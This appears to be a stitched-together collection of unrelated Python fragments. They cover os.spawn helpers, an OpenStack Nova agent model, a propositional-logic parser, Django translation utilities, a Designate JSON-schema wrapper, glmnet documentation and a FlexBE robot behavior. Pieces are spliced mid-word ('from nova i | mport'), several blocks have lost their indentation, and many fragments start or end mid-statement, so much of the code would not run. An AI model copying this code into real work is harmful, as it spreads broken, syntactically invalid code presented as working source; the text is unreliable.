if _exists("fork") and not _exists("spawnv") and _exists("execv"):
P_WAIT = 0
P_NOWAIT = P_NOWAITO = 1
# XXX Should we support P_DETACH? I suppose it could fork()**2
# and close the std I/O streams. Also, P_OVERLAY is the same
# as execv*()?
    def _spawnvef(mode, file, args, env, func):
        # Internal helper; func is the exec*() function to use
        pid = fork()
        if not pid:
            # Child
            try:
                if env is None:
                    func(file, args)
                else:
                    func(file, args, env)
            except:
                # Bare except on purpose: the child must never return into
                # the parent's code; exit with the conventional 127 status.
                _exit(127)
        else:
            # Parent
            if mode == P_NOWAIT:
                return pid # Caller is responsible for waiting!
            # P_WAIT: reap the child, translating its status into either an
            # exit code (>= 0) or -signal for a signalled death.
            while 1:
                wpid, sts = waitpid(pid, 0)
                if WIFSTOPPED(sts):
                    continue
                elif WIFSIGNALED(sts):
                    return -WTERMSIG(sts)
                elif WIFEXITED(sts):
                    return WEXITSTATUS(sts)
                else:
                    raise error, "Not stopped, signaled or exited???"
    def spawnv(mode, file, args):
        """spawnv(mode, file, args) -> integer
        Execute file with arguments from args in a subprocess.
        If mode == P_NOWAIT return the pid of the process.
        If mode == P_WAIT return the process's exit code if it exits normally;
        otherwise return -SIG, where SIG is the signal that killed it. """
        # No environment override: the child inherits ours.
        return _spawnvef(mode, file, args, None, execv)
    def spawnve(mode, file, args, env):
        """spawnve(mode, file, args, env) -> integer
        Execute file with arguments from args in a subprocess with the
        specified environment.
        If mode == P_NOWAIT return the pid of the process.
        If mode == P_WAIT return the process's exit code if it exits normally;
        otherwise return -SIG, where SIG is the signal that killed it. """
        # Same as spawnv(), but with an explicit environment mapping.
        return _spawnvef(mode, file, args, env, execve)
    # Note: spawnvp[e] isn't currently supported on Windows
    def spawnvp(mode, file, args):
        """spawnvp(mode, file, args) -> integer
        Execute file (which is looked for along $PATH) with arguments from
        args in a subprocess.
        If mode == P_NOWAIT return the pid of the process.
        If mode == P_WAIT return the process's exit code if it exits normally;
        otherwise return -SIG, where SIG is the signal that killed it. """
        # execvp searches $PATH for the executable.
        return _spawnvef(mode, file, args, None, execvp)
    def spawnvpe(mode, file, args, env):
        """spawnvpe(mode, file, args, env) -> integer
        Execute file (which is looked for along $PATH) with arguments from
        args in a subprocess with the supplied environment.
        If mode == P_NOWAIT return the pid of the process.
        If mode == P_WAIT return the process's exit code if it exits normally;
        otherwise return -SIG, where SIG is the signal that killed it. """
        # $PATH search plus an explicit environment mapping.
        return _spawnvef(mode, file, args, env, execvpe)
if _exists("spawnv"):
    # These aren't supplied by the basic Windows code
    # but can be easily implemented in Python
    def spawnl(mode, file, *args):
        """spawnl(mode, file, *args) -> integer
        Execute file with arguments from args in a subprocess.
        If mode == P_NOWAIT return the pid of the process.
        If mode == P_WAIT return the process's exit code if it exits normally;
        otherwise return -SIG, where SIG is the signal that killed it. """
        # Variadic convenience wrapper: pack *args into a tuple for spawnv().
        return spawnv(mode, file, args)
def spawnle(mode, file, *args):
"""spawnle(mode, file, *args, env) -> integer
Execute file with arguments from |
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova i | mport exception
from nova import objects
from nova.objects import | base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
    """A guest-agent build record, looked up by (hypervisor, os, architecture)."""
    # Version 1.0: initial version
    VERSION = '1.0'
    fields = {
        'id': fields.IntegerField(read_only=True),
        'hypervisor': fields.StringField(),
        'os': fields.StringField(),
        'architecture': fields.StringField(),
        'version': fields.StringField(),
        'url': fields.StringField(),
        'md5hash': fields.StringField(),
    }
    @staticmethod
    def _from_db_object(context, agent, db_agent):
        # Copy every declared field from the DB row onto the object and
        # mark it clean so obj_get_changes() starts empty.
        for name in agent.fields:
            agent[name] = db_agent[name]
        agent._context = context
        agent.obj_reset_changes()
        return agent
    @base.remotable_classmethod
    def get_by_triple(cls, context, hypervisor, os, architecture):
        """Return the Agent matching the triple, or None when absent."""
        db_agent = db.agent_build_get_by_triple(context, hypervisor,
                                                os, architecture)
        if not db_agent:
            return None
        return cls._from_db_object(context, objects.Agent(), db_agent)
    @base.remotable
    def create(self, context):
        """Persist a new agent build; 'id' must not be pre-set by the caller."""
        updates = self.obj_get_changes()
        if 'id' in updates:
            raise exception.ObjectActionError(action='create',
                                              reason='Already Created')
        db_agent = db.agent_build_create(context, updates)
        self._from_db_object(context, self, db_agent)
    @base.remotable
    def destroy(self, context):
        """Delete this agent build from the database."""
        db.agent_build_destroy(context, self.id)
    @base.remotable
    def save(self, context):
        """Flush pending field changes to the database row."""
        updates = self.obj_get_changes()
        db.agent_build_update(context, self.id, updates)
        self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
    """A list of Agent objects."""
    # Version 1.0: initial version
    VERSION = '1.0'
    fields = {
        'objects': fields.ListOfObjectsField('Agent'),
    }
    # Maps each list version to the contained Agent object version.
    child_versions = {
        '1.0': '1.0',
    }
    @base.remotable_classmethod
    def get_all(cls, context, hypervisor=None):
        """Return all agent builds, optionally filtered by hypervisor."""
        db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
        return base.obj_make_list(context, cls(), objects.Agent, db_agents)
|
"""Describe the language syntax."""
import re
class Symbol:
    """Describes the language symbols."""
    # General pattern of formulas. Raw strings: '\-', '\|' and '\(' are
    # invalid escape sequences in normal string literals (deprecated since
    # Python 3.6, a future SyntaxError).
    pattern = r'([a-z0-9&\-\|><\(\)]*)'
    accepted_chars = r'([a-z0-9&\-\|><\(\)]*)'
    def __init__(self, value):
        """Init a propositional symbol with its textual value."""
        self.value = value
    @classmethod
    def check(cls, symbol):
        """Return a match object if 'symbol' fully matches cls.pattern."""
        regexp = re.compile(r'^%s$' % cls.pattern)
        return regexp.match(symbol)
    @classmethod
    def accepts_initial_char(cls, char):
        """Check if the operator accepts the given char as initial char.
        NOTE: subclasses must define 'accepted_initial_char'; the base
        class does not, so calling this on Symbol itself raises
        AttributeError.
        """
        regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
        return regexp.match(char)
    def is_a(self, cls):
        """Check if this token is a given type."""
        return isinstance(self, cls)
    def __str__(self):
        """Return the symbol value as str."""
        return self.value
class PropositionalSymbol(Symbol):
    """Propositional (atomic) symbols of the language.
    A propositional symbol is one lowercase letter optionally followed
    by an integer index, e.g.: p, p1, q23, r1890.
    """
    accepted_initial_char = '[a-z]'
    pattern = '([a-z]{1}[0-9]*)'
    def subformulas(self):
        """An atomic symbol has a single subformula: itself."""
        return [self]
    def str_representation(self):
        """Render the symbol as its own textual value."""
        return self.value
    def evaluate(self, symbol_values):
        """Look up this symbol's truth value in the valuation mapping."""
        return symbol_values[self.str_representation()]
    def count_terms(self):
        """An atomic symbol counts as exactly one term."""
        return 1
class PontuationSymbol(Symbol):
    """
    Describes the pontuation symbols of the language.
    The pontuation symbols are represented by the
    opening and closing parenthesis.
    """
    # Raw string: '\(' and '\)' are invalid escape sequences in a normal
    # string literal (deprecated since Python 3.6).
    pattern = r'([\(\)])'
class OpeningParenthesis(PontuationSymbol):
    """Describes the opening parenthesis."""
    # Raw strings avoid the deprecated '\(' escape sequence.
    accepted_initial_char = r'\('
    pattern = r'\('
class ClosingParenthesis(PontuationSymbol):
    """Describes the closing parenthesis."""
    # Raw strings avoid the deprecated '\)' escape sequence.
    accepted_initial_char = r'\)'
    pattern = r'\)'
class Operator(Symbol):
    """Base class for language operators."""
    # NOTE(review): concrete operators are expected to also define SYMBOL,
    # 'precendence' (sic) and 'associativity' -- see the subclasses below.
    class Associativity:
        """Possible operators associativity."""
        LEFT = 1
        RIGHT = 0
    def subformulas(self):
        """Get the formula subformulas."""
        raise NotImplementedError
    def evaluate(self, symbol_values):
        """Evaluate an operator with given values."""
        raise NotImplementedError
    def __str__(self):
        """Return the string representation as str."""
        return self.str_representation()
class BinaryOperator(Operator):
    """Common behaviour shared by all two-argument operators."""
    def set_args(self, arg1, arg2):
        """Store the left and right operands."""
        self.arg1 = arg1
        self.arg2 = arg2
    def subformulas(self):
        """Return both operands' subformulas followed by this formula."""
        return self.arg1.subformulas() + self.arg2.subformulas() + [self]
    def _operand_repr(self, operand):
        # Parenthesise the operand unless it is atomic or binds at least
        # as tightly as this operator.
        no_parens = operand.is_a(PropositionalSymbol) or (
            operand.is_a(Operator) and
            self.precendence <= operand.precendence
        )
        if no_parens:
            return operand.str_representation()
        return '(' + operand.str_representation() + ')'
    def str_representation(self):
        """Render the operator symbol between its two rendered operands."""
        return (self._operand_repr(self.arg1) + self.SYMBOL +
                self._operand_repr(self.arg2))
    def count_terms(self):
        """Count terms: this operator plus the terms of both operands."""
        return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
    """Common behaviour shared by all one-argument operators."""
    def set_arg(self, arg):
        """Store the single operand."""
        self.arg1 = arg
    def subformulas(self):
        """Return the operand's subformulas followed by this formula."""
        return self.arg1.subformulas() + [self]
    def str_representation(self):
        """Render the operator symbol before its (possibly wrapped) operand."""
        rendered = self.arg1.str_representation()
        if not self.arg1.is_a(PropositionalSymbol):
            # Composite operands need explicit grouping.
            rendered = '(' + rendered + ')'
        return self.SYMBOL + rendered
    def count_terms(self):
        """Count terms: this operator plus the operand's terms."""
        return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
    """Describe the negation operator."""
    SYMBOL = '-'
    # Raw strings avoid the deprecated '\-' escape sequence.
    accepted_initial_char = r'\-'
    pattern = r'\-'
    precendence = 6
    associativity = Operator.Associativity.RIGHT
    def evaluate(self, symbol_values):
        """Evaluate a negation with given values."""
        return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
    """The logical AND operator (&)."""
    SYMBOL = '&'
    accepted_initial_char = '&'
    pattern = '&'
    precendence = 5
    associativity = Operator.Associativity.LEFT
    def evaluate(self, symbol_values):
        """True exactly when both operands evaluate to true.
        Uses Python's short-circuit 'and', so the right operand is only
        evaluated when the left one is true.
        """
        return (self.arg1.evaluate(symbol_values) and
                self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
    """Describe the disjunction operator."""
    SYMBOL = '|'
    # Raw strings avoid the deprecated '\|' escape sequence.
    accepted_initial_char = r'\|'
    pattern = r'\|'
    precendence = 4
    associativity = Operator.Associativity.LEFT
    def evaluate(self, symbol_values):
        """Evaluate a disjunction with given values."""
        return (self.arg1.evaluate(symbol_values) or
                self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
    """Describe the implication operator."""
    SYMBOL = '->'
    # Raw strings avoid the deprecated '\-' escape sequence.
    accepted_initial_char = r'\-'
    pattern = r'\->'
    precendence = 3
    associativity = Operator.Associativity.LEFT
    def evaluate(self, symbol_values):
        """
        Evaluate an implication with given values.
        To do the trick: p -> q = -p | q
        """
        return (not self.arg1.evaluate(symbol_values) or
                self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
    """Describe the bi-implication operator."""
    SYMBOL = '<->'
    accepted_initial_char = '<'
    # Raw string avoids the deprecated '\-' escape sequence in '<\->'.
    pattern = r'<\->'
    precendence = 2
    associativity = Operator.Associativity.LEFT
    def evaluate(self, symbol_values):
        """
        Evaluate a bi-implication with given values.
        To do the trick: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
        """
        return (
            not self.arg1.evaluate(symbol_values) or
            self.arg2.evaluate(symbol_values)
        ) and (
            not self.arg2.evaluate(symbol_values) or
            self.arg1.evaluate(symbol_values)
        )
|
# -*- coding: utf-8 -*-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
    '''
    Custom MaximumIntensityProjectionGenerationAlgorithm for Generic TIFF Series
    that makes sure that the first timepoint in a series is registered for
    creation of the representative thumbnail.
    NOTE(review): this is a Jython class run inside an openBIS dropbox; it
    subclasses a Java algorithm class.
    '''
    def __init__(self, datasetTypeCode, width, height, filename):
        """
        Constructor
        """
        # Call the parent base constructor
        MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
            datasetTypeCode, width, height, filename)
    def imageToBeIgnored(self, image):
        """
        Overrides the parent imageToBeIgnored method. The selection of which
        series should be used to create the representative thumbnail is done
        in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
        MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
        to make a decision based on the timepoint (== 0), since we cannot know
        which is the first time point in a Generic TIFF Series.
        """
        # Never ignore: always defer the choice to the dataset config.
        return False
|
'''
Created on 17/2/2015
| @author: PC0 | 6
Primer cambio en el proyecto
'''
from include import app
if __name__ == '__main__':
    # Serve locally on port 9000 with debug enabled (development only).
    app.run("127.0.0.1", 9000, debug=True)
e on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
    """
    Turn a language name (en-us) into a locale name (en_US).
    If 'to_lower' is True the last component is lower-cased (en_us).
    """
    head, sep, tail = language.partition('-')
    if not sep:
        # No region component: the language name is the whole locale.
        return language.lower()
    tail = tail.lower() if to_lower else tail.upper()
    return head.lower() + '_' + tail
def to_language(locale):
    """Turn a locale name (en_US) into a language name (en-us)."""
    head, sep, tail = locale.partition('_')
    if not sep:
        # No region component: just normalise the case.
        return locale.lower()
    return head.lower() + '-' + tail.lower()
class DjangoTranslation(gettext_module.GNUTranslations):
    """
    This class sets up the GNUTranslations context with regard to output
    charset. Django uses a defined DEFAULT_CHARSET as the output charset on
    Python 2.4. With Python 2.3, use DjangoTranslation23.
    """
    def __init__(self, *args, **kw):
        # NOTE: the unused 'from django.conf import settings' import that
        # used to live here has been removed -- nothing in this method
        # referenced it.
        gettext_module.GNUTranslations.__init__(self, *args, **kw)
        # set_output_charset() only exists on newer gettext implementations;
        # where it is missing, the output charset equals the translation
        # file's charset.
        try:
            self.set_output_charset('utf-8')
        except AttributeError:
            pass
        self.django_output_charset = 'utf-8'
        # '??' marks a translation whose language has not been set yet.
        self.__language = '??'
    def merge(self, other):
        """Fold another translation's catalog into this one."""
        self._catalog.update(other._catalog)
    def set_language(self, language):
        """Record which language this translation represents."""
        self.__language = language
    def language(self):
        """Return the language recorded by set_language()."""
        return self.__language
    def __repr__(self):
        return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslatio | n23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
return res.encode(self.django_output_charset)
def translation(language):
    """
    Returns a translation object.
    This translation object will be constructed out of multiple GNUTranslations
    objects by merging their catalogs. It will construct a object for the
    requested language and add a fallback to the default language, if it's
    different from the requested language.
    """
    global _translations
    # Fast path: reuse a previously built translation for this language.
    t = _translations.get(language, None)
    if t is not None:
        return t
    from django.conf import settings
    # set up the right translation class
    klass = DjangoTranslation
    if sys.version_info < (2, 4):
        klass = DjangoTranslation23
    # Global catalog shipped with Django itself.
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    if settings.SETTINGS_MODULE is not None:
        parts = settings.SETTINGS_MODULE.split('.')
        project = import_module(parts[0])
        projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
    else:
        projectpath = None
    def _fetch(lang, fallback=None):
        # Build (or return cached) merged translation for one language,
        # layering: global -> LOCALE_PATHS -> project -> installed apps.
        global _translations
        loc = to_locale(lang)
        res = _translations.get(lang, None)
        if res is not None:
            return res
        def _translation(path):
            # Load one catalog from 'path'; None when it does not exist.
            try:
                t = gettext_module.translation('django', path, [loc], klass)
                t.set_language(lang)
                return t
            except IOError, e:
                return None
        res = _translation(globalpath)
        # We want to ensure that, for example, "en-gb" and "en-us" don't share
        # the same translation object (thus, merging en-us with a local update
        # doesn't affect en-gb), even though they will both use the core "en"
        # translation. So we have to subvert Python's internal gettext caching.
        # NOTE(review): if the global catalog is missing, 'res' is None here
        # and the copy below would raise AttributeError -- confirm intended.
        base_lang = lambda x: x.split('-', 1)[0]
        if base_lang(lang) in [base_lang(trans) for trans in _translations]:
            res._info = res._info.copy()
            res._catalog = res._catalog.copy()
        def _merge(path):
            # Merge the catalog at 'path' into 'res' (or seed it).
            t = _translation(path)
            if t is not None:
                if res is None:
                    return t
                else:
                    res.merge(t)
            return res
        for localepath in settings.LOCALE_PATHS:
            if os.path.isdir(localepath):
                res = _merge(localepath)
        if projectpath and os.path.isdir(projectpath):
            res = _merge(projectpath)
        for appname in settings.INSTALLED_APPS:
            app = import_module(appname)
            apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
            if os.path.isdir(apppath):
                res = _merge(apppath)
        if res is None:
            if fallback is not None:
                res = fallback
            else:
                return gettext_module.NullTranslations()
        _translations[lang] = res
        return res
    default_translation = _fetch(settings.LANGUAGE_CODE)
    current_translation = _fetch(language, fallback=default_translation)
    return current_translation
def activate(language):
    """
    Fetches the translation object for a given tuple of application name and
    language and installs it as the current translation object for the current
    thread.
    """
    # Translations are tracked per-thread, keyed by the thread object.
    _active[currentThread()] = translation(language)
def deactivate():
    """
    Deinstalls the currently active translation object so that further _ calls
    will resolve against the default translation object, again.
    """
    # pop() with a default removes the entry when present and is a no-op
    # otherwise -- same effect as the membership-test-then-delete idiom.
    _active.pop(currentThread(), None)
def deactivate_all():
    """
    Makes the active translation object a NullTranslations() instance. This is
    useful when we want delayed translations to appear as the original string
    for some reason.
    """
    # Unlike deactivate(), this installs an explicit no-op translation.
    _active[currentThread()] = gettext_module.NullTranslations()
def get_language():
    """Returns the currently selected language."""
    t = _active.get(currentThread(), None)
    if t is not None:
        try:
            return to_language(t.language())
        except AttributeError:
            # NullTranslations has no language() method; fall through.
            pass
    # If we don't have a real translation object, assume it's the default language.
    from django.conf import settings
    return settings.LANGUAGE_CODE
def get_language_bidi():
    """
    Returns selected language's BiDi layout.
    False = left-to-right layout
    True = right-to-left layout
    """
    from django.conf import settings
    # Compare only the base language ('he' from 'he-il') against the
    # configured right-to-left language list.
    return get_language().split('-')[0] in settings.LANGUAGES_BIDI
def catalog():
    """
    Returns the current active catalog for further processing.
    This can be used if you need to modify the catalog or want to access the
    whole message catalog instead of just translating one string.
    """
    global _default, _active
    t = _active.get(currentThread(), None)
    if t is not None:
        return t
    # No per-thread translation: lazily build and cache the default one.
    if _default is None:
        from django.conf import settings
        _default = translation(settings.LANGUAGE_CODE)
    return _default
def do_tr |
def get_file_e | xtension(filename):
return filename.split(". | ")[-1]
|
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
    """Wraps a loaded JSON schema: validation plus instance filtering."""
    def __init__(self, version, name):
        """Load the named schema for the given API version ('v2' or 'admin')."""
        self.raw_schema = utils.load_schema(version, name)
        self.resolver = resolvers.LocalResolver.from_schema(
            version, self.raw_schema)
        if version in ['v2', 'admin']:
            self.validator = validators.Draft4Validator(
                self.raw_schema, resolver=self.resolver,
                format_checker=format.draft4_format_checker)
        else:
            raise Exception('Unknown API version: %s' % version)
    @property
    def schema(self):
        # The (possibly resolved) schema held by the validator.
        return self.validator.schema
    @property
    def properties(self):
        return self.schema['properties']
    @property
    def links(self):
        return self.schema['links']
    @property
    def raw(self):
        return self.raw_schema
    def validate(self, obj):
        """Validate obj against the schema; raise InvalidObject on errors."""
        LOG.debug('Validating values: %r' % obj)
        errors = []
        for error in self.validator.iter_errors(obj):
            errors.append({
                'path': ".".join([str(x) for x in error.path]),
                'message': error.message,
                'validator': error.validator
            })
        if len(errors) > 0:
            LOG.debug('Errors in validation: %r' % errors)
            raise exceptions.InvalidObject("Provided object does not match "
                                           "schema", errors=errors)
    def filter(self, instance, properties=None):
        """Return a copy of instance keeping only schema-declared properties.
        Missing properties come back as None; nested objects and arrays
        are filtered recursively.
        """
        if not properties:
            properties = self.properties
        filtered = {}
        for name, subschema in list(properties.items()):
            if 'type' in subschema and subschema['type'] == 'array':
                subinstance = instance.get(name, None)
                filtered[name] = self._filter_array(subinstance, subschema)
            elif 'type' in subschema and subschema['type'] == 'object':
                subinstance = instance.get(name, None)
                # Distinct name: the original rebound 'properties' here,
                # shadowing the dict being iterated.
                sub_properties = subschema['properties']
                filtered[name] = self.filter(subinstance, sub_properties)
            else:
                filtered[name] = instance.get(name, None)
        return filtered
    def _filter_array(self, instance, schema):
        """Filter each element of an array instance against its item schema."""
        if 'items' in schema and isinstance(schema['items'], list):
            # NOTE(kiall): We currently don't make use of this..
            raise NotImplementedError()
        elif 'items' in schema:
            schema = schema['items']
            if '$ref' in schema:
                with self.resolver.resolving(schema['$ref']) as ischema:
                    schema = ischema
            properties = schema['properties']
            return [self.filter(i, properties) for i in instance]
        elif 'properties' in schema:
            # BUG FIX: the original resolved schema['$ref'] *after* replacing
            # 'schema' with its 'properties' dict, which raised KeyError --
            # a properties dict has no '$ref' key. The stray resolving lines
            # (duplicated from the branch above) are removed.
            schema = schema['properties']
            return [self.filter(i, schema) for i in instance]
        else:
            raise NotImplementedError('Can\'t filter unknown array type')
|
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
                dataset from that evaluated on the (K-1)/K dataset.
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm. |
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and | then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
LICENSE: GPL-2
AUTHORS:
Algorithm was designed by Jerome Friedman, Trevor Hastie and Rob Tibshirani
Fortran code was written by Jerome Friedman
 R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hastie
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
REFERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
matlabpool;
x=randn(1e3,100);
y=randn(1e3,1);
tic;
cvglmnet(x,y);
toc;
tic;
cvglmnet(x,y,[],[],[],[],[],true);
toc;
"""
import sys
import joblib
import multiprocessing
from glmnetSet import glmnetSet
from glmnetPredict import glmnetPredict
import scipy
from glmnet import glmnet
from cvelnet import cvelnet
from cvlognet import cvlognet
from cvmultnet import cvmultnet
from cvmrelnet import cvmrelnet
from cvfishnet import cvfishnet
def cvglmnet(*, x,
y,
family = 'gaussian',
ptype = 'default',
nfolds = 10,
foldid = scipy.empty([0]),
parallel = False,
keep = False,
grouped = True,
**options):
options = glmnetSet(options)
if 0 < len(options['lambdau']) < 2:
raise ValueError('Need more than one value of lambda for cv.glmnet')
nobs = x.shape[0]
# we should not really need this. user must supply the right shape
# if y.shape[0] != nobs:
# y |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, | PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
class Init_SequenceSM(Behavior):
    '''
    Initialisation Sequence
    '''

    def __init__(self):
        super(Init_SequenceSM, self).__init__()
        self.name = 'Init_Sequence'
        # parameters of this behavior
        # references to used behaviors
        # Additional initialization code can be added inside the following tags
        # [MANUAL_INIT]
        # [/MANUAL_INIT]
        # Behavior comments:

    def create(self):
        # Builds the state machine: set the head angle, run the "repos"
